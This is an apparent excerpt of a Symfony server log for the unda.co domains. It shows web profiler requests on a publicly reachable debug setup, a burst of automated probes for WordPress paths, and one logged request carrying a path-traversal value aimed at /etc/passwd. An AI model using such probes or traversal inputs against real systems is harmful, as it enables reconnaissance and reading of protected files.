  8562. [2025-12-20 22:09:48] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=config","method":"GET"} []
  8563. [2025-12-20 22:11:59] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"cd6bf0","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/cd6bf0?panel=time","method":"GET"} []
  8564. [2025-12-20 22:11:59] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=time","method":"GET"} []
  8565. [2025-12-20 22:13:33] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /remote/login"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /remote/login\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  8566. [2025-12-20 22:13:34] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /login"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /login\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  8567. [2025-12-20 22:14:28] request.INFO: Matched route "homepage". {"route":"homepage","route_parameters":{"_controller":"AppBundle\\Controller\\DefaultController::indexAction","_route":"homepage"},"request_uri":"https://www.unda.co/","method":"GET"} []
  8568. [2025-12-20 22:15:09] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /wp-admin/css/colors/blue" (from "https://www.google.de/")" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /wp-admin/css/colors/blue\" (from \"https://www.google.de/\") at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  8569. [2025-12-20 22:15:11] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /wp-includes/block-bindings" (from "https://www.google.com/")" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /wp-includes/block-bindings\" (from \"https://www.google.com/\") at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  8570. [2025-12-20 22:15:14] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /wp-includes/js/dist" (from "https://www.google.co.uk/")" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /wp-includes/js/dist\" (from \"https://www.google.co.uk/\") at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  8571. [2025-12-20 22:15:15] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /wp-includes/rest-api/fields" (from "https://www.google.com/")" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /wp-includes/rest-api/fields\" (from \"https://www.google.com/\") at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  8572. [2025-12-20 22:15:21] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /wp-includes/images" (from "https://www.bing.com/")" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /wp-includes/images\" (from \"https://www.bing.com/\") at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  8573. [2025-12-20 22:15:22] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /wp-includes/js/dist/development" (from "https://www.bing.com/")" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /wp-includes/js/dist/development\" (from \"https://www.bing.com/\") at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  8574. [2025-12-20 22:15:26] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /wp-admin" (from "https://www.yahoo.com/")" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /wp-admin\" (from \"https://www.yahoo.com/\") at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  8575. [2025-12-20 22:15:27] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /wp-admin/css" (from "https://www.google.com/")" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /wp-admin/css\" (from \"https://www.google.com/\") at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  8576. [2025-12-20 22:15:28] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /wp-admin/js" (from "https://www.yahoo.com/")" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /wp-admin/js\" (from \"https://www.yahoo.com/\") at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  8577. [2025-12-20 22:15:29] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /wp-admin/js/widgets" (from "https://duckduckgo.com/")" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /wp-admin/js/widgets\" (from \"https://duckduckgo.com/\") at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  8578. [2025-12-20 22:15:30] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /wp-content/backups-dup-lite" (from "https://www.google.de/")" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /wp-content/backups-dup-lite\" (from \"https://www.google.de/\") at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  8579. [2025-12-20 22:15:31] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /wp-content/languages" (from "https://www.google.de/")" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /wp-content/languages\" (from \"https://www.google.de/\") at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  8580. [2025-12-20 22:15:32] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /wp-content/uploads" (from "https://duckduckgo.com/")" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /wp-content/uploads\" (from \"https://duckduckgo.com/\") at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  8581. [2025-12-20 22:15:33] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /wp-content/uploads/2025" (from "https://duckduckgo.com/")" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /wp-content/uploads/2025\" (from \"https://duckduckgo.com/\") at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  8582. [2025-12-20 22:15:34] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /wp-includes/IXR" (from "https://duckduckgo.com/")" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /wp-includes/IXR\" (from \"https://duckduckgo.com/\") at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  8583. [2025-12-20 22:15:35] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /wp-includes/Text" (from "https://www.google.fr/")" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /wp-includes/Text\" (from \"https://www.google.fr/\") at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  8584. [2025-12-20 22:15:36] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /wp-includes/Text/Diff/Engine" (from "https://www.google.fr/")" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /wp-includes/Text/Diff/Engine\" (from \"https://www.google.fr/\") at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  8585. [2025-12-20 22:15:37] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /wp-includes/block-supports" (from "https://www.google.com/")" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /wp-includes/block-supports\" (from \"https://www.google.com/\") at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  8586. [2025-12-20 22:15:38] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /wp-includes/blocks/code" (from "https://www.google.de/")" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /wp-includes/blocks/code\" (from \"https://www.google.de/\") at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  8587. [2025-12-20 22:15:40] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /wp-includes/rest-api" (from "https://www.google.fr/")" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /wp-includes/rest-api\" (from \"https://www.google.fr/\") at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  8588. [2025-12-20 22:15:41] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /wp-includes/theme-compat" (from "https://www.google.de/")" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /wp-includes/theme-compat\" (from \"https://www.google.de/\") at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  8589. [2025-12-20 22:19:45] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"5f0320","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/5f0320","method":"GET"} []
  8590. [2025-12-20 22:19:45] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar","method":"GET"} []
  8591. [2025-12-20 22:20:18] request.INFO: Matched route "_profiler_open_file". {"route":"_profiler_open_file","route_parameters":{"_controller":"web_profiler.controller.profiler:openAction","_route":"_profiler_open_file"},"request_uri":"https://unda.co/_profiler/open?file=vendor%2Fsymfony%2Fmonolog-bundle&line=0","method":"GET"} []
  8592. [2025-12-20 22:21:37] request.INFO: Matched route "index". {"route":"index","route_parameters":{"_controller":"Hona\\LandingBundle\\Controller\\DefaultController::indexAction","_route":"index"},"request_uri":"https://unda.co/","method":"GET"} []
  8593. [2025-12-20 22:22:44] request.INFO: Matched route "_profiler_open_file". {"route":"_profiler_open_file","route_parameters":{"_controller":"web_profiler.controller.profiler:openAction","_route":"_profiler_open_file"},"request_uri":"https://unda.co/_profiler/open?file=vendor%2Fsymfony%2Fsymfony%2Fsrc%2FSymfony%2FBundle%2FTwigBundle&line=0","method":"GET"} []
  8594. [2025-12-20 22:23:19] request.INFO: Matched route "homepage". {"route":"homepage","route_parameters":{"_controller":"AppBundle\\Controller\\DefaultController::indexAction","_route":"homepage"},"request_uri":"https://api.unda.co/?..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd","method":"GET"} []
  8595. [2025-12-20 22:23:19] security.DEBUG: Checking for guard authentication credentials. {"firewall_key":"bearer_presence","authenticators":1} []
  8596. [2025-12-20 22:23:19] security.DEBUG: Checking support on guard authenticator. {"firewall_key":"bearer_presence","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
  8597. [2025-12-20 22:23:19] security.DEBUG: Guard authenticator does not support the request. {"firewall_key":"bearer_presence","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
  8598. [2025-12-20 22:23:19] security.INFO: Populated the TokenStorage with an anonymous Token. [] []
  8599. [2025-12-20 22:23:19] security.DEBUG: Access denied, the user is not fully authenticated; redirecting to authentication entry point. {"exception":"[object] (Symfony\\Component\\Security\\Core\\Exception\\AccessDeniedException(code: 403): Access Denied. at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/Security/Http/Firewall/AccessListener.php:68)"} []
  8600. [2025-12-20 22:23:19] security.DEBUG: Calling Authentication entry point. [] []
  8601. [2025-12-20 22:25:16] request.INFO: Matched route "_profiler_open_file". {"route":"_profiler_open_file","route_parameters":{"_controller":"web_profiler.controller.profiler:openAction","_route":"_profiler_open_file"},"request_uri":"https://unda.co/_profiler/open?file=vendor%2Fsymfony%2Fsymfony%2Fsrc%2FSymfony%2FComponent%2FHttpKernel%2FEventListener%2FFragmentListener.php&line=68","method":"GET"} []
  8602. [2025-12-20 22:27:22] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"cd6bf0","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/cd6bf0","method":"GET"} []
  8603. [2025-12-20 22:27:22] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar","method":"GET"} []
  8604. [2025-12-20 22:30:08] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"35e76f","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/35e76f?panel=cache","method":"GET"} []
  8605. [2025-12-20 22:30:08] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=cache","method":"GET"} []
  8606. [2025-12-20 22:31:01] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\AccessDeniedHttpException: "" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/FragmentListener.php line 90 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\AccessDeniedHttpException(code: 0):  at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/FragmentListener.php:90)"} []
  8607. [2025-12-20 22:32:48] request.INFO: Matched route "_profiler_open_file". {"route":"_profiler_open_file","route_parameters":{"_controller":"web_profiler.controller.profiler:openAction","_route":"_profiler_open_file"},"request_uri":"https://unda.co/_profiler/open?file=vendor%2Fsymfony%2Fsymfony%2Fsrc%2FSymfony%2FBundle%2FWebProfilerBundle&line=0","method":"GET"} []
  8608. [2025-12-20 22:39:15] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"533e9e","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/533e9e?panel=config","method":"GET"} []
  8609. [2025-12-20 22:39:15] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=config","method":"GET"} []
  8610. [2025-12-20 22:39:24] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"1f2b28","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/1f2b28?panel=cache","method":"GET"} []
  8611. [2025-12-20 22:39:24] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=cache","method":"GET"} []
  8612. [2025-12-20 22:40:19] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /sitemap.xml"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /sitemap.xml\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  8613. [2025-12-20 22:42:56] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"cd6bf0","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/cd6bf0?panel=config","method":"GET"} []
  8614. [2025-12-20 22:42:56] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=config","method":"GET"} []
  8615. [2025-12-20 22:45:18] request.INFO: Matched route "_profiler_open_file". {"route":"_profiler_open_file","route_parameters":{"_controller":"web_profiler.controller.profiler:openAction","_route":"_profiler_open_file"},"request_uri":"https://unda.co/_profiler/open?file=vendor%2Fsensio%2Fdistribution-bundle&line=0","method":"GET"} []
  8616. [2025-12-20 22:45:20] request.INFO: Matched route "_profiler_open_file". {"route":"_profiler_open_file","route_parameters":{"_controller":"web_profiler.controller.profiler:openAction","_route":"_profiler_open_file"},"request_uri":"https://unda.co/_profiler/open?file=src%2FAppBundle&line=0","method":"GET"} []
  8617. [2025-12-20 22:45:23] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"latest","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/latest?panel=config","method":"GET"} []
  8618. [2025-12-20 22:45:23] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=config","method":"GET"} []
  8619. [2025-12-20 22:47:44] request.INFO: Matched route "_profiler_open_file". {"route":"_profiler_open_file","route_parameters":{"_controller":"web_profiler.controller.profiler:openAction","_route":"_profiler_open_file"},"request_uri":"https://unda.co/_profiler/open?file=vendor%2Faws%2Faws-sdk-php-symfony%2Fsrc&line=0","method":"GET"} []
  8620. [2025-12-20 22:48:31] request.INFO: Matched route "home". {"route":"home","route_parameters":{"_controller":"Hona\\AuthBundle\\Controller\\HomeController::indexAction","domain":"auth.unda.co","_route":"home"},"request_uri":"https://auth.unda.co/?redirect_uri=https%3A%2F%2Fadmin.unda.co%2F","method":"GET"} []
  8621. [2025-12-20 22:53:17] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"1bb1dd","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/1bb1dd","method":"GET"} []
  8622. [2025-12-20 22:53:17] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar","method":"GET"} []
  8623. [2025-12-20 22:58:10] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"40234e","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/40234e?panel=db","method":"GET"} []
  8624. [2025-12-20 22:58:10] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=db","method":"GET"} []
  8625. [2025-12-20 22:58:12] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"b6e509","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/b6e509?panel=config","method":"GET"} []
  8626. [2025-12-20 22:58:12] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=config","method":"GET"} []
  8627. [2025-12-20 22:58:42] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"c07d72","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/c07d72?panel=cache","method":"GET"} []
  8628. [2025-12-20 22:58:42] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=cache","method":"GET"} []
